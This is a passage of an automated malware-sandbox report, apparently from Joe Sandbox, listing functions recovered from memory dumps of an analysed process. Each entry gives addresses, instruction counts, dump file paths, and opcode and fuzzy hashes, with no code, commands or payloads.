                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 44e20c627967671df3b00fd9ca36f56e963e8e67fbb794ad6b3491106a7a60ff
                                                                                                        • Instruction ID: 2dda80ff3f3d05948ef9c30545a3aa48bd591073ac8e4bfca25c73b2f249252f
                                                                                                        • Opcode Fuzzy Hash: 44e20c627967671df3b00fd9ca36f56e963e8e67fbb794ad6b3491106a7a60ff
                                                                                                        • Instruction Fuzzy Hash: 1C212430304202CBCB151B798854B7E36A6AFD434A7154039DC26DF6B9EF29CC8BD391
                                                                                                        Function 3969FC5B Relevance: .1, Instructions: 92COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a9006e2798e2ec702cf4a70618459353b2f35f15c3cf3accee2a7388c1662e87
                                                                                                        • Instruction ID: 4cf53b8f2291c828cd5f2010ee9177b912c182bad5e39015fc274d3460de8e9b
                                                                                                        • Opcode Fuzzy Hash: a9006e2798e2ec702cf4a70618459353b2f35f15c3cf3accee2a7388c1662e87
                                                                                                        • Instruction Fuzzy Hash: B031E274E11248CBEB08CFAAD8406DEBBF2BF8A300F50D06AD418BB254DB745906CF54
                                                                                                        Function 001541A0 Relevance: .1, Instructions: 91COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 731f49873937126781f1d445990523315e04904818e0a665b8d8b683915cbe1f
                                                                                                        • Instruction ID: db8b5d710cf88247f38ae704913e8890072da49f0f78424454dd532a26c0aff9
                                                                                                        • Opcode Fuzzy Hash: 731f49873937126781f1d445990523315e04904818e0a665b8d8b683915cbe1f
                                                                                                        • Instruction Fuzzy Hash: 42419375E01218CFCB48DFA9D98099DBBB2BF89301F208029E815BB364DB34A846CF54
                                                                                                        Function 00158380 Relevance: .1, Instructions: 87COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d36e909ef7635c994d80100b2065f58673101962b8eb2f29c42d8d0df8a74bf0
                                                                                                        • Instruction ID: 47d85b892c50dd1df2070bf3d42d9b836392204b43d3935fa19ad72f849ba8ff
                                                                                                        • Opcode Fuzzy Hash: d36e909ef7635c994d80100b2065f58673101962b8eb2f29c42d8d0df8a74bf0
                                                                                                        • Instruction Fuzzy Hash: 3A21A130300212CBDB145A698954B3F229BAFD474AF248039DD26DF7A8EF75CC8B9391
                                                                                                        Function 001528F0 Relevance: .1, Instructions: 77COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9bf941938cc573581de96c4af29c9658ffd2689727371f8317dcc0c71f2ca0db
                                                                                                        • Instruction ID: 7350c44cba6490f39d1cfa91aacf9250856b73dce8f3b4a6ad5458e44aa74951
                                                                                                        • Opcode Fuzzy Hash: 9bf941938cc573581de96c4af29c9658ffd2689727371f8317dcc0c71f2ca0db
                                                                                                        • Instruction Fuzzy Hash: DA21B036A00125AFCB15CB74C440AAE77A5EB9E360F20C019D81A9B358DB30EE46CBD0
                                                                                                        Function 0009D554 Relevance: .1, Instructions: 75COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2933899905.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_9d000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8e8bcc104757df970fb15f2bc66d01c4de277daa153a682d830bce02da0edeac
                                                                                                        • Instruction ID: 60d16c130a94acb0d227916c3c0a57bb57e090369012bd88bc0aadc796cab4b5
                                                                                                        • Opcode Fuzzy Hash: 8e8bcc104757df970fb15f2bc66d01c4de277daa153a682d830bce02da0edeac
                                                                                                        • Instruction Fuzzy Hash: 4F214871544200DFCF10DF14D9C0B2ABFA1FB98314F20C56AD9090B256C336D856EBA1
                                                                                                        Function 00156300 Relevance: .1, Instructions: 74COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2a8a8b4d994398ab507859a4dbeea33221d9a5dd53374dcb358181e2b10bc2d6
                                                                                                        • Instruction ID: a42671e8c96666e084bd852411a1c7468a35b2a24fab2d2381d5c5763ebd22bd
                                                                                                        • Opcode Fuzzy Hash: 2a8a8b4d994398ab507859a4dbeea33221d9a5dd53374dcb358181e2b10bc2d6
                                                                                                        • Instruction Fuzzy Hash: 8A21DE35300611CBC7199B29C858A2EB3A2FF897527558468E81ADB7A8CF30DC068BD0
                                                                                                        Function 000AD044 Relevance: .1, Instructions: 72COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2933988201.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ad000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 65fca742bbaae97bc371c15bcf55d465ac507d2a90817398babcb9ce95f50b47
                                                                                                        • Instruction ID: fd34caae4f2ceb859ffdeface12b1d093a7b4e51219088a8a3720a58a51c45a1
                                                                                                        • Opcode Fuzzy Hash: 65fca742bbaae97bc371c15bcf55d465ac507d2a90817398babcb9ce95f50b47
                                                                                                        • Instruction Fuzzy Hash: 21214971504204EFCB10CF64C9C4F26BBA1FB85314F20C66EE94A4F751C73AD846CA61
                                                                                                        Function 00155649 Relevance: .1, Instructions: 69COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a9c17aba23938a3ed7704dd3354fc0661b54cb59071478f27166aa7cc350fc1e
                                                                                                        • Instruction ID: 081d2eb6e705196a42584f69595559c41cec830230e6bc6e2b90cf95e24f4986
                                                                                                        • Opcode Fuzzy Hash: a9c17aba23938a3ed7704dd3354fc0661b54cb59071478f27166aa7cc350fc1e
                                                                                                        • Instruction Fuzzy Hash: F421F231209288CFCB019F64D964AAE3BB2EB49315F604069F8199F255CB34DD55DBA0
                                                                                                        Function 00154285 Relevance: .1, Instructions: 68COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f6db1bb2aab0f15f39c8a71e25e91bce7c3b1be7b0da8e2ae323c9bd63f42852
                                                                                                        • Instruction ID: 7d9b551fbffd60966c8c68b11bf8f1971bf7fdca89754b5c0a63928c49c237ee
                                                                                                        • Opcode Fuzzy Hash: f6db1bb2aab0f15f39c8a71e25e91bce7c3b1be7b0da8e2ae323c9bd63f42852
                                                                                                        • Instruction Fuzzy Hash: ED318078E11218CFCB44DFA8D58489DBBB6FF49305B2044AAE819AB364D735AD45CF40
                                                                                                        Function 396949E0 Relevance: .1, Instructions: 68COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 403d417d5bfc59ef73604881ae10ee8aa0423253bbe86a1755899a2955d2bdcd
                                                                                                        • Instruction ID: 67bfd6a3beba8d70b267a6db0a9d9e4346d6a98287b57533e5a8ae515b50be27
                                                                                                        • Opcode Fuzzy Hash: 403d417d5bfc59ef73604881ae10ee8aa0423253bbe86a1755899a2955d2bdcd
                                                                                                        • Instruction Fuzzy Hash: 58112B353083548FD7065B38A8048DD7F6AEBC621172485B7EA4ACF3A2CE29CC47C395
                                                                                                        Function 00159761 Relevance: .1, Instructions: 65COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7502819db9ef8d39cfbcc3617ed0c4cc47ad4cfd3cc8e25e6f1ebc8befb936ed
                                                                                                        • Instruction ID: 137aaa54f773548abf62da9eb7f831396ad30f4596a9529a8a84aa9c5b7c120a
                                                                                                        • Opcode Fuzzy Hash: 7502819db9ef8d39cfbcc3617ed0c4cc47ad4cfd3cc8e25e6f1ebc8befb936ed
                                                                                                        • Instruction Fuzzy Hash: 57214B30E0124DDFDB05CFA5D550AEDBFB6AF49305F2480A9E825BA2A0DB30D985DF60
                                                                                                        Function 001562F0 Relevance: .1, Instructions: 62COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 69a9a452e6b05edd1b94f75ecf225dcea2fc40f7c6830ad988ed5dcc46488f94
                                                                                                        • Instruction ID: 2fa9b7fb593e788b408063d0e4ffe15ac63ece5fa4584364154e6543d2e88420
                                                                                                        • Opcode Fuzzy Hash: 69a9a452e6b05edd1b94f75ecf225dcea2fc40f7c6830ad988ed5dcc46488f94
                                                                                                        • Instruction Fuzzy Hash: 5B11CE35708611CFC7199B29C86852EBBB2BF8579235940A9E81ACF7A4CF20CC468B90
                                                                                                        Function 3969992C Relevance: .1, Instructions: 62COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f22bb17afdb8803b7f267a5f988ab224483df007d25ae7288f22f580e57fb4b8
                                                                                                        • Instruction ID: dec1986e78d44a83f5c635909f4b14c281064fe70da31988e7e3b19d0729c31d
                                                                                                        • Opcode Fuzzy Hash: f22bb17afdb8803b7f267a5f988ab224483df007d25ae7288f22f580e57fb4b8
                                                                                                        • Instruction Fuzzy Hash: 06115E78E122098FEB04DFA9D884AEDBBB5FF88314F14C165E904E7246DB74AD41CB60
                                                                                                        Function 0015F640 Relevance: .1, Instructions: 60COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6ca34cfabc000418d725c8ad27b8613f5320b7a606b484acffcd03de5acb5613
                                                                                                        • Instruction ID: ad8b771066bce317774da6135db24aacfc2cbb2bca8dad35249c69c687259b22
                                                                                                        • Opcode Fuzzy Hash: 6ca34cfabc000418d725c8ad27b8613f5320b7a606b484acffcd03de5acb5613
                                                                                                        • Instruction Fuzzy Hash: B4214DB0D0020D9FDB05DFA9D54069EBFB2FB85304F10C5AAD018AB365EB749A499F80
                                                                                                        Function 001527F0 Relevance: .1, Instructions: 57COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 1799070cecee3d47a04adea005b404a91b00ba5f7a458b24dc6bc01ba1b0fe04
                                                                                                        • Instruction ID: 36347cd37823125c5acaca98f99820f090bb8234c574862ac80c3b6e6ca22a6e
                                                                                                        • Opcode Fuzzy Hash: 1799070cecee3d47a04adea005b404a91b00ba5f7a458b24dc6bc01ba1b0fe04
                                                                                                        • Instruction Fuzzy Hash: 0221E374D05249CFCB01DFB9D9445EDBFF4AF4A300F1052AAD809B7221EB345A89CBA1
                                                                                                        Function 39694C00 Relevance: .1, Instructions: 57COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5be8502cc31ca173e71ad6d8cda70a1775cf2474204d1e76886a1878b56ac5b5
                                                                                                        • Instruction ID: c9cd3ceb93d9f53929e9512d3df3047a8a1c9bc2326dbd77c412c33aaca989c7
                                                                                                        • Opcode Fuzzy Hash: 5be8502cc31ca173e71ad6d8cda70a1775cf2474204d1e76886a1878b56ac5b5
                                                                                                        • Instruction Fuzzy Hash: 11115A36E12329DFCB10EFB884506DEBBB6AB88250B545129D418E7300EB31A8428BE1
                                                                                                        Function 0009D54F Relevance: .1, Instructions: 56COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2933899905.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_9d000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e30d8c23d169001941ea9aa459473fa7ec8b4af4ddb27b59cb516a26a12e2698
                                                                                                        • Instruction ID: 28b3f5ef59fdc6155d1cf3ec30333247b97edc4fe69eaae99f9bbaa3c5a3dc0f
                                                                                                        • Opcode Fuzzy Hash: e30d8c23d169001941ea9aa459473fa7ec8b4af4ddb27b59cb516a26a12e2698
                                                                                                        • Instruction Fuzzy Hash: 24110376544280CFCF02CF14D5C4B16BFB1FB94314F24C5AAD8090B616C336D85ADBA2
                                                                                                        Function 0015F650 Relevance: .1, Instructions: 54COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dcc1baedc02eee9e29eac21e7e24b1d033764bb153cf5089fd5574bf0007d282
                                                                                                        • Instruction ID: 7fabe2be5ee8450558bddeb75b3d409102433b652d56f8977d0c8abab34af70b
                                                                                                        • Opcode Fuzzy Hash: dcc1baedc02eee9e29eac21e7e24b1d033764bb153cf5089fd5574bf0007d282
                                                                                                        • Instruction Fuzzy Hash: F411DD70D0010D9FDB44EFA9D54069EBFF1FB85304F10D5A9D014AB365EB749A4A9F81
                                                                                                        Function 000AD03F Relevance: .1, Instructions: 53COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2933988201.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_ad000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: aeeb28edeb7a7844692f5c9e5b1c86b761d25cb2a560f87f4e21d5c9dbefd6d7
                                                                                                        • Instruction ID: 911a06aec871ac25ffe0fb9b76f0ff3ed1228e86413c044d7106d63c55da38df
                                                                                                        • Opcode Fuzzy Hash: aeeb28edeb7a7844692f5c9e5b1c86b761d25cb2a560f87f4e21d5c9dbefd6d7
                                                                                                        • Instruction Fuzzy Hash: 2E11D075504244DFCB11CF50C5C4B15BFA1FB45314F24C6AED84A4B652C33AD84ACF52
                                                                                                        Function 3A7FEC8B Relevance: .1, Instructions: 52COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974986779.000000003A7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a7f0000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e7567c5787cb5559b65ce9ffe6e23d7fbfeeee71bed635ed7f09dd0b0325ce92
                                                                                                        • Instruction ID: 697427bbb6841cf99f7a2026eb36b4fe0aeb0b93dacd4e684c55013ae0e508ea
                                                                                                        • Opcode Fuzzy Hash: e7567c5787cb5559b65ce9ffe6e23d7fbfeeee71bed635ed7f09dd0b0325ce92
                                                                                                        • Instruction Fuzzy Hash: 420145BAB101108FCB10DB7CE44888D7FF6AF88361B0005E5EC85DB364DA32CD06CAA2
                                                                                                        Function 00155E98 Relevance: .1, Instructions: 52COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: da19d7a91b5597aa89b9cf220b271d1874431094b6d82e833b591711702e3181
                                                                                                        • Instruction ID: aa864a3ae522808f2c87094be09c5eed03dc4ba5139dbb19e23f810937a4a8ad
                                                                                                        • Opcode Fuzzy Hash: da19d7a91b5597aa89b9cf220b271d1874431094b6d82e833b591711702e3181
                                                                                                        • Instruction Fuzzy Hash: 69016832704204AFCB068F649C217AE3BB7DFC9350B148066FD18DB290DB318E069B90
                                                                                                        Function 39693248 Relevance: .1, Instructions: 52COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e8033467d4df1c3ebec2e1f5ef39caa3bc948a2a004eb427fbf97671495a6d34
                                                                                                        • Instruction ID: 45a8d0cbe4f545a7d40461e1658aff3a67d7760be8a5dc070664b6e13f481f27
                                                                                                        • Opcode Fuzzy Hash: e8033467d4df1c3ebec2e1f5ef39caa3bc948a2a004eb427fbf97671495a6d34
                                                                                                        • Instruction Fuzzy Hash: 9301B135A40209EFDB00EF69C8449DE7BB5FB8C750B10463AEC2AE7201D7345D12DBA1
                                                                                                        Function 396944CF Relevance: .0, Instructions: 49COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 96cbc116bec46c0b0a8c9b15d486fd1c431758d5f7054cd1a3f1837825993b8d
                                                                                                        • Instruction ID: cb0a721e6adec082d7a55b789b37948f0aefcebe6d42fdde296b9f25ed6128c3
                                                                                                        • Opcode Fuzzy Hash: 96cbc116bec46c0b0a8c9b15d486fd1c431758d5f7054cd1a3f1837825993b8d
                                                                                                        • Instruction Fuzzy Hash: 1501D435A00205DF8B60EFA9D4409DEFFF5FF98350B004136DA1897211DB30AA568BD1
                                                                                                        Function 3A7FEBE3 Relevance: .0, Instructions: 47COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974986779.000000003A7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A7F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_3a7f0000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e43d42afd18f8c04d0c0832d4011633df5f7753b188f036f14b53bf49887a34c
                                                                                                        • Instruction ID: 1f7e7a6feb927592cae92949deb877576d1a8a1cad7c4fbd6178ce50b3243246
                                                                                                        • Opcode Fuzzy Hash: e43d42afd18f8c04d0c0832d4011633df5f7753b188f036f14b53bf49887a34c
                                                                                                        • Instruction Fuzzy Hash: F20157B6A102118FC750DF78D48895E7BF5AF89311B0145AAE849DB320DB31C942CB91
                                                                                                        Function 39694C98 Relevance: .0, Instructions: 47COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 048ba2cfafe82aff7d8c0d0a0dd7e583f01dbf61cc5b740b5775a56247049e4e
                                                                                                        • Instruction ID: 21563086c0f5a3ecc3c97a90bf28c1bc973a50d0d8cd74d8947d8414268cb481
                                                                                                        • Opcode Fuzzy Hash: 048ba2cfafe82aff7d8c0d0a0dd7e583f01dbf61cc5b740b5775a56247049e4e
                                                                                                        • Instruction Fuzzy Hash: 22F0F636B052209FC7055F19A4119EF7BA9EFC566470440BBE808CB361CE26DC02C794
                                                                                                        Function 39694640 Relevance: .0, Instructions: 46COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3305415c354edccfbf1e5404ae9bffbfdc274b82e64e11d21fad0cb94dfc16cf
                                                                                                        • Instruction ID: 81473120e5eab1325024495b5e4adf5c68b3fc6ac3bc0e770514440f9c697b24
                                                                                                        • Opcode Fuzzy Hash: 3305415c354edccfbf1e5404ae9bffbfdc274b82e64e11d21fad0cb94dfc16cf
                                                                                                        • Instruction Fuzzy Hash: F1019AB53116208FD714DF29D688E86B7E9EF89761F118479E10A8B361CA71EC04CB51
                                                                                                        Function 39693258 Relevance: .0, Instructions: 46COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2974390025.0000000039690000.00000040.00000800.00020000.00000000.sdmp, Offset: 39690000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_39690000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 11580cfe60d51b34fcd01bc62d02d0a24ebbbf89e671d729f05a627e8e9475be
                                                                                                        • Instruction ID: 1634600633d6a9fdc3f9f81bb9c0004eff2e70b0af7082cf9bac8e728fd0fe85
                                                                                                        • Opcode Fuzzy Hash: 11580cfe60d51b34fcd01bc62d02d0a24ebbbf89e671d729f05a627e8e9475be
                                                                                                        • Instruction Fuzzy Hash: 22019E35A40219DFCB04EF69C8089EE7BB5FF88350B004039E91AE3241DB34AD11DBA1
                                                                                                        Function 0015E8E8 Relevance: .0, Instructions: 44COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 717fc49e86da6956d6eb1956790c6e311249ed725ea5345d1cc4a888eacf6e1b
                                                                                                        • Instruction ID: d1e5573063c6f6670ae487a5b84391f0fde5cb696bd06191bb1e461ad5a450ee
                                                                                                        • Opcode Fuzzy Hash: 717fc49e86da6956d6eb1956790c6e311249ed725ea5345d1cc4a888eacf6e1b
                                                                                                        • Instruction Fuzzy Hash: 9F112D74D0420AEFDB02CFE4D8445AEFBB1FB8A301F4044A6E910A7360E7355A16DF91
                                                                                                        Function 0015ABE0 Relevance: .0, Instructions: 44COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2934667558.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_150000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 6d78b528c6c8bfbc9cad9418064ce7f65bd7c568d5ce213887f6dd9c25eaa43c
